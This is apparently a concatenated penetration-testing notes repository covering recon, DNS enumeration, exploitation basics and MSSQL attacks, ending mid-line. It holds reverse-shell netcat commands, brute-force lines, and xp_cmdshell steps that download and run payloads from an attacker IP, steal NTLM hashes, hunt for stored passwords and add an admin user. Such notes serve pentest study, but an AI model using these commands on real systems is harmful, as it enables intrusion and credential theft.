* Mobile apps encrypt traffic with HTTPS, which uses a certificate to do this
* We can insert the Burp certificate into Android to capture requests
* Developer protection: certificate pinning
  * The app checks that only its own (pinned) certificate is accepted for the TLS connection
* Our solution: certificate pinning bypass
  * Overwrite the code in the API that's responsible for checking the cert
  * Frida

## Tools

* ADB (Android Debug Bridge)
* jadx
* dex2jar
* Frida
* Burp Suite
* Genymotion
* Android Studio Virtual Device Manager
-------------------------------------------------------------------------------- /penetration-testing-methodology/5-stages-of-ethical-hacking.md: --------------------------------------------------------------------------------
# 5 Stages of Ethical Hacking

## 5 Stages of Ethical Hacking

### Reconnaissance

#### AKA Footprinting

* Finding out specific IP addresses, TCP & UDP services; identifying vulnerabilities
* Network, host, people involved

#### Active

Directly interacting with the target to gather information about it.

#### Passive

Collecting information about the target without directly accessing it, for example from social media, public websites, etc.

### Scanning (& Enumeration)

Nmap, Nessus, Nikto, etc.

1. **Pre-attack** - The hacker scans the network for specific information based on what was gathered during reconnaissance.
2. **Port scanning** - Scanning the target for open ports, live systems and the services running on each host.
3. **Vulnerability scanning** - Checking the target for weaknesses or vulnerabilities which can be exploited, usually with automated tools.
4. **Network mapping/information extraction** - Finding the topology of the network (routers, firewalls, servers if any) and host information, and drawing a network diagram from the available information. This map may serve as a valuable piece of information throughout the hacking process.

### Gaining Access (Exploitation)

This phase is where an attacker breaks into the system/network using various tools or methods. After entering a system, they have to escalate their privileges to administrator level so they can install the applications they need, or modify or hide data.

#### Examples

* Phishing, MitM, brute force, spoofing, DoS, BOF, session hijacking, BEC

### Maintaining Access

A hacker may just hack the system to show it was vulnerable, or may want to maintain (persist) the connection in the background without the knowledge of the user. This can be done using Trojans, rootkits or other malicious files.
The aim is to maintain the access to the target until he finishes the tasks he planned to accomplish in that target. 40 | 41 | ### Clearing Tracks 42 | 43 | No thief wants to get caught. An intelligent hacker always clears all evidence so that in the later point of time, no one will find any traces leading to him. This involves modifying/corrupting/deleting the values of Logs, modifying registry values and uninstalling all applications he used and deleting all folders he created. 44 | 45 | #### Examples 46 | 47 | * Clearing the cache and cookies 48 | * Modifying registry values 49 | * Modifying/corrupting/deleting the values of Logs 50 | * Clearing out Sent emails 51 | * Closing all the open ports 52 | * Uninstalling all applications that he/she be used 53 | -------------------------------------------------------------------------------- /pentesting-network/53-dns.md: -------------------------------------------------------------------------------- 1 | # 53 (DNS) 2 | 3 | ## Enumeration 4 | 5 | When seeing port 53 show up, you can add the IP of the host to the resolv.conf file 6 | 7 | `nameserver ` 8 | 9 | ### Hostname Leak 10 | 11 | #### nslookup 12 | 13 | ```bash 14 | nslookup 15 | > server 16 | >127.0.0.1 17 | >127.0.0.2 18 | > 19 | ``` 20 | 21 | ### Banner Grabbing 22 | 23 | ```bash 24 | dig version.bind CHAOS TXT @DNS 25 | ``` 26 | 27 | ### More Info 28 | 29 | #### nslookup 30 | 31 | ```bash 32 | root@INE:~# nslookup 33 | > server 192.212.168.3 34 | > set q=NS # Can also change per record i.e. A, MX, etc. 
35 | > witrap.com # Chage the hostname as needed 36 | # Should return additional domains 37 | ``` 38 | 39 | #### dnsenum 40 | 41 | ```bash 42 | dnsenum target # Zone transfer 43 | ``` 44 | 45 | #### nmap 46 | 47 | ```bash 48 | nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" 49 | nmap --script dns-nsid 50 | ``` 51 | 52 | #### gobuster 53 | 54 | ```bash 55 | gobuster dns -d cronos.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt 56 | ``` 57 | 58 | #### Metasploit 59 | 60 | ```bash 61 | auxiliary/gather/enum_dns # Perform enumeration actions 62 | ``` 63 | 64 | ### Zone Transfers 65 | 66 | #### dig / fierce 67 | 68 | ```bash 69 | dig axfr @ns1.test.com 70 | dig axfr @ # Try zone transfer without domain 71 | dig axfr @ # Try zone transfer guessing the domain 72 | fierce --domain --dns-servers # Will try to perform a zone transfer against every authoritative name server and if this doesn'twork, will launch a dictionary attack 73 | dig @192.212.168.3 witrap.com -t AXFR +nocookie 74 | ``` 75 | 76 | #### Host 77 | 78 | ```bash 79 | # Zone transfer 80 | sudo vim /etc/hosts 81 | 10.10.10.123 friendzone.red 82 | host -l 10.10.10.123 friendzone.red # Zone Transfer 83 | host -t axfr witrap.com 192.212.168.3 84 | ``` 85 | 86 | #### dnsrecon 87 | 88 | ```bash 89 | dnsrecon -d target.com -t axfr # Zone Transfer 90 | dnsrecon -d target.com -D words.txt -t brt # Brute force domain 91 | dnsrecon -d -a 92 | ``` 93 | 94 | ## Brute Force 95 | 96 | ### Reverse 97 | 98 | #### dnsrecon 99 | 100 | ```bash 101 | dnsrecon -d 102 | dnsrecon -d active.htb -a -n # Zone transfer 103 | dnsrecon -r 127.0.0.0/24 -n -d # DNS reverse of all of the addresses 104 | dnsrecon -r 127.0.0.1/24 -n -d # DNS reverse of all of the addresses 105 | dnsrecon -r /24 -n # DNS reverse of all of the addresses 106 | dnsrecon -d -r 10.0.0.0/8 107 | ``` 108 | 109 | ### Subdomain 110 | 111 | #### dnsrecon / dnscan 112 | 113 | ```bash 114 | 
dnsrecon -D subdomains-1000.txt -d -n 115 | dnscan -d -r -w subdomains-1000.txt # Bruteforce subdomains in recursive way, https://github.com/rbsec/dnscan 116 | ``` 117 | 118 | #### Other 119 | 120 | ``` 121 | https://github.com/blark/aiodnsbrute 122 | ``` 123 | -------------------------------------------------------------------------------- /exploitation/exploitation-basics.md: -------------------------------------------------------------------------------- 1 | # Exploitation Basics 2 | 3 | ## Reverse Shells vs Bind Shells 4 | 5 | ### Reverse Shell 6 | 7 | A victim connects to us. 8 | 9 | #### Attacker 10 | 11 | ```bash 12 | nc -lvnp 4444 # Listening 13 | ``` 14 | 15 | #### Target 16 | 17 | ```bash 18 | nc -e /bin/sh # Connecting 19 | ``` 20 | 21 | ### Bind Shell 22 | 23 | We connect to the victim. 24 | 25 | #### Attacker 26 | 27 | ```bash 28 | nc 4444 # Connecting 29 | ``` 30 | 31 | #### Target 32 | 33 | ```bash 34 | nc -lvnp 4444 -e /bin/sh # Listening 35 | ``` 36 | 37 | ## Staged vs Non-Staged Payloads 38 | 39 | ### Staged 40 | 41 | * Sends payload in stages 42 | * Can be less stable 43 | * Example: `windows/meterpreter/reverse_tcp` 44 | 45 | ### Non-staged 46 | 47 | * Sends exploit shellcode all at once 48 | * Larger in size and won't always work 49 | * Example: `windows/meterpreter_reverse_tcp` 50 | 51 | ## Gaining Root with Metasploit 52 | 53 | ### Example 54 | 55 | ```bash 56 | searchsploit samba 2.2 57 | # Found a 'trans2open' vulnerability with (Metasploit) mentioned 58 | msfconsole 59 | search trans2open 60 | use exploit/linux/samba/trans2open 61 | set RHOSTS 62 | run / exploit 63 | # Session kept opening and closing... 
64 | # Looking at the options we see the payload linux/x86/meterpreter/reverse_tcp 65 | # Since this didn't work we can change it to a Non-staged payload 66 | set payload linux/x86/shell_reverse_tcp 67 | run / exploit 68 | ``` 69 | 70 | ## Manual Exploitation 71 | 72 | ### Example 73 | 74 | Finding an Apache mod\_ssl < 2.8.7 vulnerability 75 | 76 | Used Google to identify there is an exploit called OpenLuck on GitHub 77 | 78 | Followed the steps on GitHub to download, install, compile, and run the exploit. 79 | 80 | ## Brute Force Attacks 81 | 82 | ### Tools 83 | 84 | #### Hydra 85 | 86 | ```bash 87 | hydra -l -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh:// -t 4 88 | ``` 89 | 90 | #### Metasploit 91 | 92 | ```bash 93 | search ssh 94 | use auxiliary/scanner/ssh/ssh_login 95 | set USERNAME root 96 | set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt 97 | set RHOSTS 98 | run 99 | ``` 100 | 101 | ## Credential Stuffing and Password Spraying 102 | 103 | ### What is Credential Stuffing? 104 | 105 | Injecting breached account credentials in hopes of account takeover by testing large volumes of stolen usernames and passwords across multiple sites. 106 | 107 | ### What is Password Spraying? 108 | 109 | Injecting breached account credentials in hopes of account takeover by attempting to access a large number of sites using known account identifiers (usernames) with a few commonly used passwords. 110 | 111 | ## Metasploit Unleashed 112 | 113 | {% embed url="https://www.offensive-security.com/metasploit-unleashed" %} 114 | 115 | ## Armitage 116 | 117 | _Armitage_ is a fantastic Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit. 
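The credential stuffing and password spraying definitions above describe the attacker's side; as an added example that is not part of these notes, the following Python shows how a defender can separate spraying (few passwords tried across many accounts) from classic brute force (many attempts against one account) in sshd authentication logs. The log lines, source IPs and the thresholds `min_attempts` and `spray_user_ratio` are constructed assumptions for this example.

```python
"""Classify failed-login activity per source IP as spraying or brute force.

Added example, not from the original notes. The sshd-style log lines and
the detection thresholds are constructed for illustration.
"""
import re
from collections import defaultdict

# Constructed sshd failure/success lines (documentation-range IPs).
SAMPLE_LOG = """\
Jan 10 10:00:01 web1 sshd[2001]: Failed password for alice from 203.0.113.5 port 51000 ssh2
Jan 10 10:00:02 web1 sshd[2002]: Failed password for bob from 203.0.113.5 port 51001 ssh2
Jan 10 10:00:03 web1 sshd[2003]: Failed password for carol from 203.0.113.5 port 51002 ssh2
Jan 10 10:00:04 web1 sshd[2004]: Failed password for dave from 203.0.113.5 port 51003 ssh2
Jan 10 10:00:05 web1 sshd[2005]: Failed password for erin from 203.0.113.5 port 51004 ssh2
Jan 10 10:00:06 web1 sshd[2006]: Failed password for invalid user admin from 203.0.113.5 port 51005 ssh2
Jan 10 10:01:00 web1 sshd[2101]: Failed password for root from 198.51.100.7 port 40000 ssh2
Jan 10 10:01:01 web1 sshd[2102]: Failed password for root from 198.51.100.7 port 40001 ssh2
Jan 10 10:01:02 web1 sshd[2103]: Failed password for root from 198.51.100.7 port 40002 ssh2
Jan 10 10:01:03 web1 sshd[2104]: Failed password for root from 198.51.100.7 port 40003 ssh2
Jan 10 10:01:04 web1 sshd[2105]: Failed password for root from 198.51.100.7 port 40004 ssh2
Jan 10 10:01:05 web1 sshd[2106]: Failed password for root from 198.51.100.7 port 40005 ssh2
Jan 10 10:02:00 web1 sshd[2201]: Failed password for alice from 192.0.2.9 port 33000 ssh2
Jan 10 10:02:30 web1 sshd[2202]: Accepted password for alice from 192.0.2.9 port 33001 ssh2
"""

# sshd writes "invalid user" before names that do not exist on the host.
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port"
)


def parse_failures(log_text):
    """Return a list of (source_ip, username) for every failed-password line."""
    failures = []
    for line in log_text.splitlines():
        match = FAILED_RE.search(line)
        if match:
            failures.append((match.group("src"), match.group("user")))
    return failures


def classify_sources(failures, min_attempts=5, spray_user_ratio=0.8):
    """Label each source IP that produced at least min_attempts failures.

    'spraying'    : distinct usernames / attempts >= spray_user_ratio, i.e.
                    one or two passwords tried against many accounts.
    'brute_force' : attempts concentrated on one or a few accounts.
    Thresholds are illustrative assumptions; tune them per environment.
    """
    attempts = defaultdict(int)
    users = defaultdict(set)
    for src, user in failures:
        attempts[src] += 1
        users[src].add(user)

    verdicts = {}
    for src, count in attempts.items():
        if count < min_attempts:
            continue  # too little activity to call either way
        ratio = len(users[src]) / count
        verdicts[src] = "spraying" if ratio >= spray_user_ratio else "brute_force"
    return verdicts


if __name__ == "__main__":
    for src, label in classify_sources(parse_failures(SAMPLE_LOG)).items():
        print(f"{src}: {label}")
```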
{% embed url="https://www.offensive-security.com/metasploit-unleashed/armitage" %}

---

/information-gathering-reconnaissance/passive-reconnaissance.md:

# Passive Reconnaissance

## Passive Reconnaissance Overview

### Physical/Social

#### Location Information

* Satellite images, drone recon, building layout (badge readers, break areas, security, fencing)

#### Job Information

* Employees (name, job title, phone number, manager, etc.)
* Pictures (badge photos, desk photos, computer photos, etc.)

### Web/Host

#### Target Validation

* WHOIS, nslookup, dnsrecon

#### Finding Subdomains

* Google Fu, dig, Nmap, Sublist3r, Bluto, crt.sh, etc.

#### Fingerprinting

* Nmap, Wappalyzer, WhatWeb, BuiltWith, Netcat

#### Data Breaches

* HaveIBeenPwned, Breach-Parse, WeLeakInfo

## Identify Our Target

Bugcrowd. Rules of engagement: make sure you're in scope, noting the out-of-scope items.

## Discovering Email Addresses

### Tools

* hunter.io
* phonebook.cz
* voilanorbert.com
* Clearbit Connect Chrome extension
* emailhippo - tools.verifyemailaddress.io
* email-checker.net/validate

## Breached Credentials

### Gathering Breached Credentials

#### Breach-Parse

Tool on GitHub by TCM that takes breached username and password credentials and searches on a specific domain name to limit the accounts to that domain. Used for credential stuffing.

### Hunting Breached Credentials

#### DeHashed

Paid service at dehashed.com.

## Hunting Subdomains

### Tools

* Sublist3r
  * `sublist3r -d tesla.com`
* crt.sh (website)
* OWASP Amass
* httprobe

## Identifying Website Technologies

### Tools

* builtwith.com
* Wappalyzer
* whatweb
  * `whatweb https://tesla.com`

## Information Gathering with Burp Suite

Intercept website traffic. View/modify requests. View target details.

## Google Fu

### Examples

* `site:tesla.com -www`
* `site:tesla.com filetype:pdf`

### Resources

{% embed url="https://ahrefs.com/blog/google-advanced-search-operators" %}

{% embed url="https://moz.com/learn/seo/search-operators" %}

## Utilizing Social Media

### Websites

* LinkedIn
* Twitter
* Facebook

### Look For

* Pictures
  * Badge photos
  * Desk pictures
* People and their information

## OSINT Fundamentals

---

/pentesting-network/1433-mssql.md:

# 1433 (MSSQL)

## Enumeration

### Checks

* [ ] Try default credentials "sa:password"
* [ ] Brute force creds
* [ ] Check database content for new passwords
* [ ] Check version for exploits
* [ ] RCE
  * [ ] through xp_cmdshell functionality
  * [ ] through injecting a payload into an output file, placing it in the webroot and triggering it through the web app

### Connection

#### sqsh

```bash
sqsh -S -U sa
sqsh -S -U sa -P password
sqsh -S :27900 -U sa -P password
```

#### mssqlclient.py

```bash
mssqlclient.py -windows-auth /:@
mssqlclient.py :@

# Once logged in you can run queries:
SQL> select @@version;

# Steal NTLM hash
sudo smbserver.py -smb2support liodeus .
SQL> exec master..xp_dirtree '\\\liodeus\' # Steal the NTLM hash, crack it with john or hashcat

# Try to enable code execution
SQL> enable_xp_cmdshell

# Execute code
SQL> xp_cmdshell whoami /all
SQL> xp_cmdshell certutil.exe -urlcache -split -f http:///nc.exe
```

### nmap

```bash
nmap -p 1433 --script='banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)' -oN 1433_nmap_mssql 
# Credential brute force
nmap -p 1433 --script ms-sql-brute --script-args passdb=/usr/share/seclists/Passwords/darkweb2017-top1000.txt 

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 
```

### xp_cmdshell

#### Enable

```sql
exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell', 1
go
reconfigure
go
```

#### Commands

```sql
-- Manual enumeration
xp_cmdshell 'whoami /all';
xp_cmdshell 'systeminfo';
xp_cmdshell 'net user'; -- Potential for brute force or password re-use
xp_cmdshell 'reg query HKLM /f pass /t REG_SZ /s'; -- Search registry for pass
xp_cmdshell 'findstr /si password *.txt *.ini *.config *xml' -- Check for plaintext passwords
-- Run other PrivEsc commands for enumeration

-- Download files for reverse shell
xp_cmdshell "powershell -c iex(new-object net.webclient).downloadstring('http://192.168.119.165:9090/Invoke-PowerShellTcp.ps1')";--
xp_cmdshell "certutil -urlcache -f 'http://192.168.119.165:9090/nc.exe' nc.exe"

-- Create user and pass then add them to Admin group (need enough permissions)
xp_cmdshell 'net user byte bytepass /add'
go
xp_cmdshell 'net localgroup Administrators byte /add'
go
xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
go
```

### Metasploit

```bash
use auxiliary/scanner/mssql/mssql_ping
```

## Brute Force

### Metasploit

```bash
scanner/mssql/mssql_login
```

### Hydra

```bash
hydra -l sa -P password.txt -V mssql
hydra -L -P mssql -vV -I -u
```

### Cheat sheet

```
https://www.asafety.fr/mssql-injection-cheat-sheet/
```

---

/scanning-and-enumeration/network-scanning.md:

# Network Scanning

## nmap

### Examples

```bash
nmap -T4 -p- -oA nmap/tcp_all_ports # Scan all TCP ports
nmap -T4 -p- --open -vv -oA nmap/tcp_all_ports_verbose # Same, but be verbose and show only open ports
nmap -sCV -p -oA nmap/tcp_def_scripts # Default scripts with found ports
nmap --script *vuln* -p -oA nmap/tcp_vuln_scripts # Vuln scripts with found ports
```

### Basic Scans

```bash
nmap # Basic scan of the top 1000 ports
nmap -p- # Basic scan of all 65535 ports
nmap -iL # Input from list of hosts/networks
nmap -v # Increase verbosity level (use -vv or more for greater effect)
```

### Host Discovery

```bash
nmap -sn # Ping scan - disable port scan
nmap -Pn # Treat all hosts as online -- skip host discovery
```

### Scan Techniques

```bash
nmap -sS # SYN scan
nmap -sU # UDP scan
```

### Port Specification

```bash
nmap -p22 # Scan a specific port
nmap -p22,80,443 # Scan multiple specific ports
nmap -p1-65535 # Scan a range of ports
```

### Service/Version & OS Detection

```bash
nmap -sV # Probe open ports to determine service/version info
nmap -O # Enable OS detection
nmap -A # Enable OS detection, version detection, script scanning, and traceroute
```

### Script Scan

```bash
nmap -sC # equivalent to --script=default
nmap --script=